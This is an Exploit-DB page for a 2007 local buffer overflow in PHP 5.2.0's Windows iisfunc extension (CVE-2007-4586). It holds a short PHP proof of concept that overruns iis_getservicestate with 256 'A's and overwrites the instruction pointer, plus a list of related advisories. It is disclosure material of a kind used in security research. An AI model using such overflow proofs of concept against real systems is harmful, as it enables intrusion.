Lucene search
BoeckeEDB-ID:4318HistoryAug 27, 2007 - 12:00 a.m.
PHP 5.2.0 (Windows x86) - 'PHP_iisfunc.dll' Local Buffer Overflow
2007-08-2700:00:00
boecke
www.exploit-db.com
19
<?php
// ==================================================================================
//
// php_iisfunc.dll PHP <= 5.2.0 (win32) Buffer Overflow PoC
//
// Discovery: boecke <[email protected]>
// Risk: Local Buffer Overflow (Medium - High Risk)
// Notes: Various other functions are exploitable, all of which convert the
// string argument(s) to unicode.
//
// extern "C" IISFUNC_API int fnStartService(LPCTSTR ServiceId);
// extern "C" IISFUNC_API int fnGetServiceState(LPCTSTR ServiceId);
// extern "C" IISFUNC_API int fnStopService(LPCTSTR ServiceId);
//
// "Sangre, sonando, de rabia naci.. Who do you trust?"
// - Cygnus, Vismund Cygnus: Sarcophagi
//
// ==================================================================================
if ( !extension_loaded( "iisfunc" ) )
{
die( "Extension not loaded.\n" );
}
$buf_unicode = str_repeat( "A", 256 );
$eip_unicode = "\x41\x41";
iis_getservicestate( $buf_unicode . $eip_unicode );
?>
# milw0rm.com [2007-08-27]Related
prion
prion
Buffer overflow
2007-08-29 01:17:00
redhatcve
redhatcve
CVE-2007-4586
2015-10-30 10:17:30
nvd
nvd
CVE-2007-4586
2007-08-29 01:17:00
cvelist
cvelist
CVE-2007-4586
2007-08-29 01:00:00
cve
cve
CVE-2007-4586
2007-08-29 01:17:00
openvas
openvas
PHP < 5.2.1 Multiple Vulnerabilities
2012-06-21 00:00:00
PHP < 5.2.1 Multiple Vulnerabilities
2020-08-17 00:00:00
nessus
nessus
PHP < 5.2.1 Multiple Vulnerabilities
2007-04-02 00:00:00